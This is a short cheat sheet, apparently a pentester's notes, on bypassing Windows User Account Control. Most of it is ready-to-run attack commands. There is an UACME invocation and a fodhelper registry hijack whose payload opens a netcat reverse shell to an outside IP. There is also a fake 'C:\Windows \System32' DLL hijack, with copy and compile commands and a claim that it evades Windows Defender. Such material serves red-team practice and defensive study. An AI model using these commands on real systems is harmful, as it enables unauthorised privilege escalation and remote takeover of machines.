# UAC Bypass

## UACME

Akagi-UACME will %99 be a win here

* <https://github.com/hfiref0x/UACME>

```
akagi64 61 c:\windows\system32\cmd.exe
```

## Technique 1&#x20;

* <https://twitter.com/xxByte/status/1381978562643824644>

```
New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value 'c:\users\morph3\nc.exe -e cmd.exe 10.10.10.33 443' -Force

New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force
```

Now simply type "fodhelper" and you should have the shell.

To undo this,

```
Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force
```

## Technique 2

This technique is pretty solid and does not get detected by the windows defender

* <https://redteamer.tips/uac-bypass-through-trusted-folder-abuse/>
* <https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e>

TLDR; you can fool windows by creating a folder called `c:\windows \System32\` you can put a windows binary(auto elevated ones) there and hijack dlls. There is a full list of hijackable binaries here,

* <https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows>

```
mkdir "C:\Windows \"
mkdir "C:\Windows \System32\"
copy "C:\Windows\System32\computerdefaults.exe" "C:\Windows \System32\computerdefaults.exe"
copy ".\morph.dll" "C:\Windows \System32\Secur32.dll"
"C:\Windows \System32\computerdefaults.exe"
```

* You might need to compile your binary in 64bit arch

```
# x64
x86_64-w64-mingw32-gcc -shared -o test.dll test.cpp

# x86
i686-w64-mingw32-gcc -shared -o test-x86.dll test.cpp
```